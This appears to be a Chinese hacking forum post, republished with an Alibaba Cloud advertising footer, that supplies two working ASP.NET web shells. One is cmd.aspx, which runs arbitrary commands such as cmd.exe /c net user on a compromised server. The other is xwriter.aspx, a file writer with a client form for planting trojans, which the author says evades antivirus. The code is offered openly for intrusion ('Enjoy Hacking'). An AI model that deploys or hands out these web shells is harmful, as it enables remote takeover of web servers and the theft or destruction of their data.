一、cmd.aspx
在邪惡八進位論壇(PS:有誰知道為什麼最近幾天這論壇打不開啊)有朋友提出WebAdmin執行命令不能帶參數的問題,偶找了個BT主機來試試,果然有問題,就把以前那個cmd.aspx改了改,就請湊合著用先。WebAdmin 2.X的下個版本將修複這個問題.
把一下代碼複製儲存為一.aspx檔案即可:
<%@ Page Language="VB" Debug="true" %><%@ import Namespace="system.IO" %><%@ import Namespace="System.Diagnostics" %><script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text) myProcessStartInfo.UseShellExecute = False myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button>
<p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label>
</p>
</form>
</body>
</html>
二、xwriter.aspx
記得有個ASP下的小馬就是利用FSO把提交的文本資訊儲存為一個檔案,雖然體積比eval大些但是代碼完全合法,殺毒軟體也不會找茬的。呵呵,以下代碼就是在ASP.NET實現這功能(自己拿去改改還可以插入ASPX檔案哦):
<%@ Page Language="VB" %>
<%@ import Namespace="System.IO" %>
<script runat="server">
Sub Page_load(sender As Object, E As EventArgs)
dim mywrite as new streamwriter(request.form("path"), true, encoding.default) mywrite.write(request.form("content"))
mywrite.close
response.write("Done!")End Sub
</script>
以下是用戶端,複製下來儲存為htm檔案:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>XWriter.NET by lake2</title>
</head>
<body>
<form name="form1" method="post" >
<div align="center">URL:
<input name="url" type="text" value="http://www.xxx.com/a.aspx" size="60">
<br>
Path:
<input name="path" type="text" id="path" value="e:\myweb\myown\a.txt" size="60">
<br>
<textarea name=content cols=120 rows=10 id="content" width=45>填入產生木馬的內容,最好是全英文</textarea>
<BR>
<center>
<br>
<input type=submit value=提交>
<br>
Enjoy Hacking !!!!!! </div>
</body></html>
<script language="javascript">
function TwoSubmit(form1){
var url = document.form1.url.value;
form1.action=url;
form1.submit();
}
</script>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
